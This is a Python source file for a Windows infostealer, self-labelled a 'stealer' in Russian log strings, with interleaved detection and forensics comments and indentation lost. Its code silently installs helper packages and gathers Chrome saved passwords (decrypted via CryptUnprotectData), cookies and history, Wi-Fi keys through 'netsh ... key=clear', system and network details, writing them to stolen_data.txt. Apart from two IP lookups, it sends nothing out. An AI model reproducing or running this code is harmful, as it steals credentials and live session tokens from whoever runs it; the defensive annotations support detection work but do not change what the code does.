import subprocess
import sys
import os
import platform
import urllib.request
import json
import traceback
import sqlite3
import shutil
import tempfile
from datetime import datetime
import getpass
import socket
# Try to locate the real desktop folder.
# The first two candidates are hard-coded to a single user profile ("lazut");
# the third is the current user's ~/Desktop. DESKTOP_PATH is the directory that
# main() later writes its output files into.
# NOTE(review): indentation was lost in this listing, so the nesting of the
# loop and `if` bodies below is inferred rather than shown.
DESKTOP_CANDIDATES = [
r"C:\Users\lazut\OneDrive\Desktop",
r"C:\Users\lazut\Desktop",
os.path.join(os.path.expanduser('~'), 'Desktop')
]
DESKTOP_PATH = None
for path in DESKTOP_CANDIDATES:
if os.path.isdir(path):
DESKTOP_PATH = path
break
if not DESKTOP_PATH:
# If nothing was found at all, force-create the OneDrive\Desktop folder.
DESKTOP_PATH = r"C:\Users\lazut\OneDrive\Desktop"
os.makedirs(DESKTOP_PATH, exist_ok=True)
# log.txt is placed in the same directory as the script file itself.
LOG_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "log.txt")
# Append str(msg) plus a newline to LOG_PATH (UTF-8) and echo msg to stdout.
# Forensics: the resulting log.txt sits next to the script and records the
# progress and error messages of every run.
def log(msg):
with open(LOG_PATH, 'a', encoding='utf-8') as f:
f.write(str(msg) + '\n')
print(msg)
# Run "<current interpreter> -m pip install <package>" with stdout and stderr
# sent to DEVNULL, so the install produces no console output. check_call
# raises CalledProcessError if pip exits with a non-zero status.
# Detection: a Python process spawning `-m pip install` with its output
# discarded shows up in process-creation telemetry.
def install(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
# Auto-install modules.
# Each pair is (import name, pip package name). browser_cookie3 and
# win32crypt (pip package pypiwin32) are imported, and installed through
# install() when the import fails; winreg has pip_name None, so neither branch
# does anything for it here.
# NOTE(review): indentation was lost in this listing; whether the final
# __import__ retry sits inside the `if pip_name:` of the except branch is
# inferred, not shown.
for mod_name, pip_name in [('browser_cookie3', 'browser_cookie3'), ('win32crypt', 'pypiwin32'), ('winreg', None)]:
try:
if pip_name:
__import__(mod_name)
except ImportError:
if pip_name:
log(f"Устанавливаю {pip_name}...")
install(pip_name)
__import__(mod_name)
import browser_cookie3
import win32crypt
import winreg
# Paths of the Chrome "Default" profile files that the two functions below
# copy and open with sqlite3: History and Login Data.
# Detection: reads of these two files by a process other than the browser are
# a common signal to alert on.
CHROME_HISTORY_DB = os.path.expanduser(r'~\AppData\Local\Google\Chrome\User Data\Default\History')
CHROME_LOGIN_DB = os.path.expanduser(r'~\AppData\Local\Google\Chrome\User Data\Default\Login Data')
# Return the processor description string reported by platform.processor().
def get_processor():
return platform.processor()
# Return the video controller name(s) obtained from a PowerShell
# Get-WmiObject Win32_VideoController query, run through the shell.
# Returns a fixed placeholder string when the output is empty and an error
# string (not an exception) when the command fails.
def get_graphics():
try:
cmd = 'powershell -Command "Get-WmiObject Win32_VideoController | Select-Object -ExpandProperty Name"'
out = subprocess.check_output(cmd, shell=True, encoding='utf-8', errors='ignore')
return out.strip() or "Не найдено"
except Exception as e:
return f"Ошибка видяхи: {e}"
# Fetch the machine's public IP address as text from https://api.ipify.org
# (5-second timeout). On any failure the error text is returned as a string
# instead of being raised; main() passes that return value on to
# get_geolocation() unchanged.
# Detection: this request is one of two outbound lookups the script makes.
def get_ip():
try:
with urllib.request.urlopen('https://api.ipify.org', timeout=5) as r:
return r.read().decode()
except Exception as e:
return f"IP не взят: {e}"
# Look up `ip` at ip-api.com over plain HTTP (5-second timeout) and return
# "city, country, isp" built from the JSON reply, with '?' for missing keys.
# Any failure is returned as an error string rather than raised.
# Detection: an unencrypted request to ip-api.com/json/<address> from a script
# host is a network indicator that can be matched in proxy or DNS logs.
def get_geolocation(ip):
try:
with urllib.request.urlopen(f'http://ip-api.com/json/{ip}', timeout=5) as r:
data = json.loads(r.read().decode())
return f"{data.get('city','?')}, {data.get('country','?')}, {data.get('isp','?')}"
except Exception as e:
return f"Гео провал: {e}"
# Read Chrome cookies through browser_cookie3.chrome() and return them as
# text, one "domain<TAB>name<TAB>value" line per cookie. Returns a placeholder
# string when nothing comes back and an error string when the call fails.
# Risk: cookie values include live session tokens, so after an incident the
# affected sessions should be treated as exposed and revoked server-side, not
# only the passwords changed.
def steal_chrome_cookies():
try:
cookies = browser_cookie3.chrome()
if not cookies:
return "Куки пусты"
return "\n".join([f"{c.domain}\t{c.name}\t{c.value}" for c in cookies])
except Exception as e:
return f"Куки провал: {e}"
# Return a four-line text block: current user name (getpass.getuser), host
# name (socket.gethostname), OS description (platform.platform) and the first
# element of platform.architecture().
def get_system_info():
return f"""Пользователь: {getpass.getuser()}
Имя ПК: {socket.gethostname()}
ОС: {platform.platform()}
Архитектура: {platform.architecture()[0]}"""
# Build a text summary of drives C: through Z:. For every drive root that
# exists, two `wmic logicaldisk` commands are run through the shell (Size and
# FreeSpace) and the last whitespace-separated token of each output is used
# as the value. Output is decoded as cp866.
# The bare `except` records a per-drive failure line instead of raising.
# Detection: a burst of wmic child processes, two per drive letter, is
# visible in process-creation logs.
def get_disk_info():
info = ""
for d in 'CDEFGHIJKLMNOPQRSTUVWXYZ':
p = d + ':\\'
if os.path.exists(p):
try:
size = subprocess.check_output(f'wmic logicaldisk where "DeviceID=\'{d}:\'" get Size',
shell=True, encoding='cp866', errors='ignore')
free = subprocess.check_output(f'wmic logicaldisk where "DeviceID=\'{d}:\'" get FreeSpace',
shell=True, encoding='cp866', errors='ignore')
info += f"{d}: Всего {size.split()[-1]} байт, Свободно {free.split()[-1]} байт\n"
except:
info += f"{d}: Не прочитать\n"
return info.strip()
# List saved WLAN profiles with `netsh wlan show profiles`, then run
# `netsh wlan show profile name="<name>" key=clear` for each profile name and
# pull the value from the first line containing "Key Content" (or its Russian
# equivalent). Returns "WiFi: <name> -> <key>" lines, a placeholder string
# when nothing was collected, or an error string on failure.
# Profile names are taken from the text after the first ':' on each line; the
# "Все" / "User" filter presumably drops header lines (verify against real
# netsh output).
# Detection: a netsh command line containing `key=clear` is a well-known
# indicator in process-creation logs (for example Sysmon event ID 1 or
# Windows Security event 4688 with command-line auditing enabled).
# NOTE(review): indentation was lost in this listing; the nesting of the
# inner loop and `break` is inferred.
def get_wifi_passwords():
try:
profiles = subprocess.check_output('netsh wlan show profiles', shell=True,
encoding='cp866', errors='ignore')
output = ""
for line in profiles.split('\n'):
if ":" in line and "Все" not in line and "User" not in line:
name = line.split(":")[1].strip()
if name:
key = subprocess.check_output(f'netsh wlan show profile name="{name}" key=clear',
shell=True, encoding='cp866', errors='ignore')
for kline in key.split('\n'):
if "Содержимое ключа" in kline or "Key Content" in kline:
pwd = kline.split(":")[1].strip()
output += f"WiFi: {name} -> {pwd}\n"
break
return output or "Нет профилей или нужны права админа"
except Exception as e:
return f"WiFi пароли: {e}"
# Return the output of `tasklist /fo csv /nh` (CSV, no header row), decoded
# as cp866 and cut to the first 2000 characters, with "..." appended when it
# was longer. Failures are returned as an error string.
def get_running_processes():
try:
out = subprocess.check_output('tasklist /fo csv /nh', shell=True,
encoding='cp866', errors='ignore')
return out[:2000] + ("..." if len(out)>2000 else "")
except Exception as e:
return f"Процессы: {e}"
# Collect installed-program names from the registry: for each of the two
# HKEY_LOCAL_MACHINE Uninstall paths (native and WOW6432Node), enumerate the
# subkeys and read each one's "DisplayName" value.
# Subkeys without a DisplayName, and paths that cannot be opened, are skipped
# silently by the bare `except` clauses.
# Returns the de-duplicated names sorted and joined by newlines, or a
# placeholder string when none were found.
def get_installed_programs():
programs = []
keys = [
r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
r"SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall"
]
for key_path in keys:
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
for i in range(0, winreg.QueryInfoKey(key)[0]):
subkey_name = winreg.EnumKey(key, i)
with winreg.OpenKey(key, subkey_name) as subkey:
try:
name = winreg.QueryValueEx(subkey, "DisplayName")[0]
programs.append(name)
except:
continue
except:
continue
programs = sorted(set(programs))
return "\n".join(programs) if programs else "Не удалось получить список"
# Read up to `max_rows` entries from the Chrome History database.
# The file at CHROME_HISTORY_DB is copied to a temporary "*.db" file, the copy
# is opened with sqlite3, and url/title/last_visit_time are selected from the
# `urls` table, newest first; the row limit is passed as a bound parameter.
# The copy is closed and deleted before the rows are formatted.
# Returns a placeholder string when the file is missing or the table is
# empty, and an error string when anything inside the try block raises.
# Forensics: if the copy or the query raises, os.unlink is never reached, so
# a leftover temp file with the ".db" suffix can remain in the temp directory.
def steal_chrome_history(max_rows=500):
if not os.path.exists(CHROME_HISTORY_DB):
return "Файл истории не найден (Chrome закрыт?)"
try:
tmp = tempfile.NamedTemporaryFile(delete=False, suffix=".db")
shutil.copy2(CHROME_HISTORY_DB, tmp.name)
conn = sqlite3.connect(tmp.name)
cur = conn.cursor()
cur.execute("SELECT url, title, last_visit_time FROM urls ORDER BY last_visit_time DESC LIMIT ?", (max_rows,))
rows = cur.fetchall()
conn.close()
os.unlink(tmp.name)
if not rows:
return "История пуста"
output = ""
# One output line per row: "<timestamp> | <title, first 50 chars> | <url>".
for url, title, timestamp in rows:
dt = datetime(1601, 1, 1) + datetime.timedelta(microseconds=timestamp) if timestamp else datetime.min
output += f"{dt.strftime('%Y-%m-%d %H:%M')} | {title[:50] if title else '?'} | {url}\n"
return output
except Exception as e:
return f"Ошибка истории: {e}"
# Read saved-login rows from the Chrome Login Data database.
# The file at CHROME_LOGIN_DB is copied to a temporary "*.db" file, the copy
# is opened with sqlite3, and origin_url/username_value/password_value are
# selected from the `logins` table; the copy is then closed and deleted.
# For each row the password blob is passed to win32crypt.CryptUnprotectData;
# when that call raises, the placeholder string is kept for that row.
# Returns "url | user | password" lines, a placeholder string when the file is
# missing or the table is empty, or an error string on failure.
# Forensics: if the copy or the query raises, os.unlink is never reached, so
# a leftover temp file with the ".db" suffix can remain in the temp directory.
# Response: every credential stored in the affected profile should be
# treated as exposed and rotated.
def steal_chrome_passwords():
if not os.path.exists(CHROME_LOGIN_DB):
return "Файл паролей не найден"
try:
tmp = tempfile.NamedTemporaryFile(delete=False, suffix=".db")
shutil.copy2(CHROME_LOGIN_DB, tmp.name)
conn = sqlite3.connect(tmp.name)
cur = conn.cursor()
cur.execute("SELECT origin_url, username_value, password_value FROM logins")
rows = cur.fetchall()
conn.close()
os.unlink(tmp.name)
if not rows:
return "Пароли отсутствуют"
output = ""
for url, user, pwd_blob in rows:
password = "Не расшифровать"
try:
password = win32crypt.CryptUnprotectData(pwd_blob, None, None, None, 0)[1].decode('utf-8', errors='replace')
except:
pass
output += f"{url} | {user} | {password}\n"
return output
except Exception as e:
return f"Ошибка паролей: {e}"
# Entry point: call every collector above and write the combined report to
# disk. Files this function creates, all usable as host indicators:
#   - test_created.txt and stolen_data.txt in DESKTOP_PATH
#   - STOLEN_EMERGENCY.txt in the user's home directory (error path only)
#   - log.txt next to the script (through log())
# Nothing in this listing transmits the report: the only explicit network
# requests are the two lookups in get_ip()/get_geolocation(), plus whatever
# pip downloads during auto-install.
# NOTE(review): indentation was lost in this listing; the extent of the
# try/except bodies is inferred.
def main():
try:
log("=== Старт стиллера ===")
log(f"Определён рабочий стол: {DESKTOP_PATH}")
# Check for the desktop folder and create it if it is missing (in case OneDrive misbehaves).
os.makedirs(DESKTOP_PATH, exist_ok=True)
# Test file, to confirm that writing works at all.
test_file = os.path.join(DESKTOP_PATH, "test_created.txt")
with open(test_file, 'w') as f:
f.write("Этот файл создан стиллером. Если видишь его, скрипт сработал.")
log(f"Тестовый файл создан: {test_file}")
# Main output file.
filepath = os.path.join(DESKTOP_PATH, "stolen_data.txt")
ip = get_ip()
data = f"""[] RAGE MODE [] EXTENDED STEALER (без UUID)
Дата: {datetime.now()}
{get_system_info()}
IP: {ip}
Геолокация: {get_geolocation(ip)}
Процессор: {get_processor()}
Видеокарта: {get_graphics()}
=== ДИСКИ ===
{get_disk_info()}
=== ПАРОЛИ Wi-Fi ===
{get_wifi_passwords()}
=== ЗАПУЩЕННЫЕ ПРОЦЕССЫ ===
{get_running_processes()}
=== УСТАНОВЛЕННЫЕ ПРОГРАММЫ ===
{get_installed_programs()}
=== ИСТОРИЯ CHROME (последние 500) ===
{steal_chrome_history(500)}
=== ПАРОЛИ CHROME ===
{steal_chrome_passwords()}
=== КУКИ CHROME ===
{steal_chrome_cookies()}
"""
with open(filepath, 'w', encoding='utf-8') as f:
f.write(data)
log(f"Основной файл успешно создан: {filepath}")
except Exception as e:
log(f"ПИЗДЕЦ ОШИБКА: {e}")
log(traceback.format_exc())
# Emergency dump into the user's home directory: the traceback is written there.
fallback = os.path.join(os.path.expanduser('~'), "STOLEN_EMERGENCY.txt")
with open(fallback, 'w', encoding='utf-8') as f:
f.write("Крах стиллера:\n" + traceback.format_exc())
log(f"Аварийный файл в {fallback}")
# Run main() only when the file is executed as a script. The module-level
# statements above (desktop detection, auto-install loop) still run on import.
if __name__ == "__main__":
main()